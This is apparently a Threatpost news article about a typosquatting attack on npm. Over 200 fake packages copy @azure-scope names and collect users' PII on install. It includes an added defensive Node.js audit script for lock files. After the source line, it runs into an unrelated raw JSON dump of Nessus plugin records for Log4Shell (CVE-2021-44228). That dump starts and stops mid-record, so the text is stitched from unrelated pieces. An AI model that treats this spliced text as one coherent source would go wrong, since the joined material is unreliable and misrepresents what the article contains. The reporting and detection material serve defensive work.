Researchers have found hundreds of malicious packages in the npm repository of open-source JavaScript code, designed to steal personally identifiable information (PII) in a large-scale typosquatting attack against Microsoft Azure cloud users.
That’s according to the JFrog Security Research team, which said that the set of packages appeared earlier this week and steadily grew since then, from about 50 packages to more than 200.
Typosquatting [refers to](<https://threatpost.com/attackers-use-typo-squatting-to-steal-npm-credentials/127235/>) the practice of naming a malicious copycat file, package, web address and so on with a name that is so similar to an existing legitimate offering that the casual observer might not notice the difference. An example of typosquatting would be using “www.go0gle.com” (the second “o” is actually a zero) to lure in victims to a watering hole – obviously trying to masquerade as the ubiquitous search engine.
In this case, the cyberattackers were pretending to offer a key set of existing, legitimate packages for Azure.
“It became apparent that this was a targeted attack against the entire @azure npm scope, by an attacker that employed an automatic script to create accounts and upload malicious packages that cover the entirety of that scope,” researchers said in a [Wednesday posting](<https://jfrog.com/blog/large-scale-npm-attack-targets-azure-developers-with-malicious-packages/>). “The attacker simply creates a new (malicious) package with the same name as an existing @azure scope package, but drops the scope name.”
Npm scopes [are a way of grouping](<https://docs.microsoft.com/en-us/azure/devops/artifacts/npm/scopes?view=azure-devops>) related packages together. JFrog found that besides the @azure scope, other popular package groups were also targeted, including @azure-rest, @azure-tests, @azure-tools and @cadl-lang.
The researchers added, “The attacker is relying on the fact that some developers may erroneously omit the @azure prefix when installing a package. For example, running npm install core-tracing by mistake, instead of the correct command – npm install @azure/core-tracing.”
The attacker also tried to hide the fact that all of the malicious packages were uploaded by the same author, “by creating a unique user (with a randomly-generated name) per each malicious package uploaded,” according to JFrog.
## **Npm: Ripe for Software Supply-Chain Attacks**
Unfortunately, while JFrog reported the packages to npm for removal, developers could already have pulled the malicious code into any number of applications, which may still be threatening Azure users.
Npm is the most oft-downloaded JavaScript package repository used by developers to build web applications, and as such, has been [increasingly targeted](<https://threatpost.com/malicious-npm-packages-web-apps/178137/>) by malicious actors to carry out software supply-chain attacks. Any app using a malicious code block could be serving up data theft to its users (as in this particular case), or other threats like cryptojacking, botnet delivery and more.
In this campaign, the number of Azure applications that could bring misery to users could be high, JFrog researchers warned.
“Since this set of legitimate packages is downloaded tens of millions of times each week, there is a high chance that some developers will be successfully fooled by the typosquatting attack,” researchers warned. From JFrog’s assessment, the package-download numbers averaged around 50 downloads per malicious package.
Given the scale of the attack, the attacker clearly used a script to upload the malicious packages, they added, which highlights that code repositories and package managers could be doing more to protect the software supply chain.
“Due to the meteoric rise of supply-chain attacks, especially through [the npm](<https://threatpost.com/discord-stealing-malware-npm-packages/163265/>) and [PyPI package repositories](<https://threatpost.com/malicious-pypi-code-packages/176971/>), it seems that more scrutiny and mitigations should be added [by package managers],” according to JFrog. “For example, adding a CAPTCHA mechanism on npm user creation would not allow attackers to easily create an arbitrary amount of users from which malicious packages could be uploaded, making attack identification easier (as well as enabling blocking of packages based on heuristics on the uploading account).”
## **Npm for PII Theft & Reconnaissance**
From a technical standpoint, JFrog found that the malicious code runs automatically once the package is installed, hoovering up the user’s username, home directory, current working directory, IP addresses of all network interfaces, IP addresses of configured DNS servers and the name of the (successful) attacking package.
The intentions of the author remain somewhat unclear, researchers added.
“We suspect that this malicious payload was either intended for initial reconnaissance on vulnerable targets (before sending a more substantial payload) or as a bug-bounty hunting attempt against Azure users (and possibly Microsoft developers),” they said.
## **Protecting Azure Apps from Malicious Packages**
Azure developers should examine their code for malicious dependencies that could have been imported this week, removing any that they find. JFrog noted that this could be done fairly efficiently.
“Make sure your installed packages are the legitimate ones, by checking that their name starts with the @azure* scope,” they explained.
They added that this can be done by changing the current directory to the npm project to be tested and running the following command:

`npm list | grep -f packages.txt`, where `packages.txt` contains the full list of affected packages.
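As an added example, not code from the article or from JFrog's post, the following Node.js script applies the same idea to a project's `package-lock.json`. It flags unscoped dependencies whose name equals the basename of a known scoped package (the `core-tracing` versus `@azure/core-tracing` pattern described above) and dependencies that declare install-time scripts, since the payload in this campaign ran as soon as the package was installed. The lock file and the list of scoped names are constructed for the example; the real @azure scope is much larger.

```javascript
// Added example: audit a package-lock.json for unscoped look-alikes of scoped
// packages and for dependencies with install-time scripts.
// Not code from the article or from JFrog; the lock file and name list below
// are constructed for illustration.

// A (constructed, partial) list of legitimate scoped packages to protect.
const KNOWN_SCOPED = [
  "@azure/core-tracing",
  "@azure/identity",
  "@azure-rest/core-client",
];

// Map each scoped name to the bare name an attacker would get by dropping the
// scope, e.g. "@azure/core-tracing" -> "core-tracing".
function bareNames(scopedNames) {
  const map = new Map();
  for (const full of scopedNames) {
    const slash = full.indexOf("/");
    if (full.startsWith("@") && slash > 0) {
      map.set(full.slice(slash + 1), full);
    }
  }
  return map;
}

// Walk the "packages" map of a lockfileVersion 2/3 package-lock.json. Keys look
// like "node_modules/foo", "node_modules/@azure/identity" or, for nested
// dependencies, "node_modules/foo/node_modules/bar". npm records
// hasInstallScript: true for packages with preinstall/install/postinstall hooks.
function auditLockfile(lock, scopedNames = KNOWN_SCOPED) {
  const lookalikes = bareNames(scopedNames);
  const findings = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (path === "") continue; // the root project entry
    const idx = path.lastIndexOf("node_modules/");
    if (idx < 0) continue;
    const name = path.slice(idx + "node_modules/".length);
    // Exact-name match, so "@azure/core-tracing" itself is never flagged.
    if (lookalikes.has(name)) {
      findings.push({
        name,
        reason: `unscoped look-alike of ${lookalikes.get(name)}`,
      });
    }
    if (meta.hasInstallScript) {
      findings.push({ name, reason: "declares install-time script" });
    }
  }
  return findings;
}

// Constructed sample lock file: a project that meant to install
// @azure/core-tracing but also pulled in the bare "core-tracing".
const SAMPLE_LOCK = {
  name: "demo-app",
  lockfileVersion: 2,
  packages: {
    "": {
      name: "demo-app",
      dependencies: { "@azure/identity": "^2.0.0", "core-tracing": "1.0.0" },
    },
    "node_modules/@azure/identity": { version: "2.0.4" },
    "node_modules/@azure/core-tracing": { version: "1.0.0" },
    "node_modules/core-tracing": { version: "1.0.0", hasInstallScript: true },
  },
};

for (const f of auditLockfile(SAMPLE_LOCK)) {
  console.log(`${f.name}: ${f.reason}`);
}
```

Matching on the exact dependency name, rather than grepping `npm list` output for substrings, keeps legitimate `@azure/*` packages out of the results. To audit a real project, replace `SAMPLE_LOCK` with `JSON.parse(fs.readFileSync("package-lock.json", "utf8"))` and extend `KNOWN_SCOPED` with the full scope or the names from JFrog's appendix. An install-script finding is not proof of malice on its own, since many legitimate native packages declare one, but it is where to look first.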
The full list of malicious packages can be found in JFrog’s [appendix to its posting](<https://jfrog.com/blog/large-scale-npm-attack-targets-azure-developers-with-malicious-packages/>) on the attack.
Source: Threatpost, "Microsoft Azure Developers Awash in PII-Stealing npm Packages," by Tara Seals, published 2022-03-24, https://threatpost.com/microsoft-azure-developers-pii-stealing-npm-packages/179096/
(CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2022-05-16T00:00:00", "type": "nessus", "title": "Cisco SD-WAN vManage Log4j Remote Code Execution (cisco-sa-apache-log4j-qRuKNEbd)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-27T00:00:00", "cpe": ["cpe:/a:cisco:sd-wan_vmanage", "cpe:/o:cisco:sd-wan_firmware"], "id": "CISCO-SA-APACHE-LOG4J-QRUKNEBD-SDWAN-VMANAGE.NASL", "href": "https://www.tenable.com/plugins/nessus/161212", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161212);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/27\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa47745\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-apache-log4j-qRuKNEbd\");\n script_xref(name:\"IAVA\", value:\"2022-A-0138-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n\n script_name(english:\"Cisco SD-WAN vManage Log4j Remote Code Execution (cisco-sa-apache-log4j-qRuKNEbd)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A package installed on the remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Cisco SD-WAN vManage is affected by the following critical vulnerability in the Apache Log4j Java \nlogging library as described in the cisco-sa-apache-log4j-qRuKNEbd advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log\n messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can 
execute arbitrary code loaded from\n LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been\n disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this\n vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging\n Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?395cf983\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID CSCwa47745\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:sd-wan_vmanage\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:sd-wan_firmware\");\n script_set_attribute(attribute:\"stig_severity\", 
value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_vedge_detect.nbin\");\n script_require_keys(\"Cisco/Viptela/Version\", \"Cisco/Viptela/Model\");\n\n exit(0);\n}\n\ninclude('ccf.inc');\n\nvar product_info = cisco::get_product_info(name:'Cisco Viptela');\n\nif (tolower(product_info['model']) !~ \"vmanage\")\n audit(AUDIT_HOST_NOT, 'an affected model');\n\nvar vuln_ranges = [\n { 'min_ver' : '20.3', 'fix_ver' : '20.3.4.1' },\n { 'min_ver' : '20.4', 'fix_ver' : '20.4.2.1' },\n { 'min_ver' : '20.5', 'fix_ver' : '20.5.1.1' },\n { 'min_ver' : '20.6', 'fix_ver' : '20.6.2.1' }\n];\n\n \nvar reporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'bug_id' , 'CSCwa47745',\n 'version' , product_info['version'],\n 'disable_caveat', TRUE\n);\n\ncisco::check_and_report(\n product_info:product_info,\n vuln_ranges:vuln_ranges,\n reporting:reporting\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-29T00:13:29", "description": "A remote code execution vulnerability exists in Apache Log4j < 2.15.0 due to insufficient protections on message lookup substitutions when dealing with user controlled input. 
A remote, unauthenticated attacker can explolit this, via a web request to execute arbitrary code with the permission level of the running Java process.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-12-16T00:00:00", "type": "nessus", "title": "Apache Log4Shell RCE detection via callback correlation (Direct Check FTP)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-28T00:00:00", "cpe": ["cpe:/a:apache:log4j"], "id": "LOG4J_LOG4SHELL_FTP.NBIN", "href": "https://www.tenable.com/plugins/nessus/156115", "sourceData": "Binary data log4j_log4shell_ftp.nbin", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-29T22:36:14", "description": "The version of log4j-cve-2021-44228-hotpatch installed on the remote host is prior to 1.3-5. It is, therefore, affected by a vulnerability as referenced in the ALAS2-2022-1806 advisory.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-06-16T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : log4j-cve-2021-44228-hotpatch (ALAS-2022-1806)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-29T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:log4j-cve-2021-44228-hotpatch", "cpe:/o:amazon:linux:2"], "id": "AL2_ALAS-2022-1806.NASL", "href": "https://www.tenable.com/plugins/nessus/162309", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2022-1806.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162309);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/29\");\n\n script_name(english:\"Amazon Linux 2 : log4j-cve-2021-44228-hotpatch (ALAS-2022-1806)\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of log4j-cve-2021-44228-hotpatch installed on the remote host is prior to 1.3-5. It is, therefore, affected\nby a vulnerability as referenced in the ALAS2-2022-1806 advisory.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2/ALAS-2022-1806.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update log4j-cve-2021-44228-hotpatch' to update your system.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:log4j-cve-2021-44228-hotpatch\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nvar os_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'log4j-cve-2021-44228-hotpatch-1.3-5.amzn2', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = 
package_array['exists_check'];\n if (reference && release && (!exists_check || rpm_exists(release:release, rpm:exists_check))) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"log4j-cve-2021-44228-hotpatch\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-28T22:21:21", "description": "A remote code execution vulnerability exists in Apache Log4j < 2.15.0 due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can explolit this, via a web request to execute arbitrary code with the permission level of the running Java process.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2022-01-07T00:00:00", "type": "nessus", "title": "Apache Log4Shell RCE detection via callback correlation (Direct Check RPCBIND)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-28T00:00:00", "cpe": ["cpe:/a:apache:log4j"], "id": "LOG4J_LOG4SHELL_RPCBIND.NBIN", "href": "https://www.tenable.com/plugins/nessus/156559", "sourceData": "Binary data log4j_log4shell_rpcbind.nbin", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-18T23:37:15", "description": "The version of FreeBSD installed on the remote host is prior to tested version. 
It is, therefore, affected by a vulnerability as referenced in the 3fadd7e4-f8fb-45a0-a218-8fd6423c338f advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to true or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to false. 
(CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-12-13T00:00:00", "type": "nessus", "title": "FreeBSD : graylog -- include log4j patches (3fadd7e4-f8fb-45a0-a218-8fd6423c338f)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-18T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:graylog", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "href": "https://www.tenable.com/plugins/nessus/156021", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156021);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/18\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n\n script_name(english:\"FreeBSD : graylog -- include log4j patches (3fadd7e4-f8fb-45a0-a218-8fd6423c338f)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the 3fadd7e4-f8fb-45a0-a218-8fd6423c338f advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect\n against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log\n messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup\n substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. 
In previous\n releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to\n true or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar\n org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see\n https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code\n execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and\n com.sun.jndi.cosnaming.object.trustURLCodebase to false. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://github.com/Graylog2/graylog2-server/commit/d3e441f1126f0dc292e986879039a87c59375b2a\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0936599f\");\n script_set_attribute(attribute:\"see_also\", value:\"https://logging.apache.org/log4j/2.x/security.html\");\n # https://vuxml.freebsd.org/freebsd/3fadd7e4-f8fb-45a0-a218-8fd6423c338f.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?90d622ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2021/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:graylog\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nvar flag = 0;\n\nvar packages = [\n 'graylog<4.2.3'\n];\n\nforeach var package( packages ) {\n if (pkg_test(save_report:TRUE, pkg: package)) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : pkg_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:19:37", "description": "The remote host appears to be running an SMTP server. 
SMTP itself is not vulnerable to Log4Shell; however, the SMTP server could potentially be affected if it attempts to log data via a vulnerable log4j library.\n\nThis plugin requires that both the scanner and target machine have internet access.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-12-17T00:00:00", "type": "nessus", "title": "Apache Log4Shell RCE detection via callback correlation (Direct Check SMTP)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-28T00:00:00", "cpe": ["cpe:/a:apache:log4j"], "id": "APACHE_LOG4SHELL_SMTP.NBIN", "href": "https://www.tenable.com/plugins/nessus/156132", "sourceData": "Binary data apache_log4shell_smtp.nbin", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-18T23:35:15", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the openSUSE-SU-2021:1586-1 advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. 
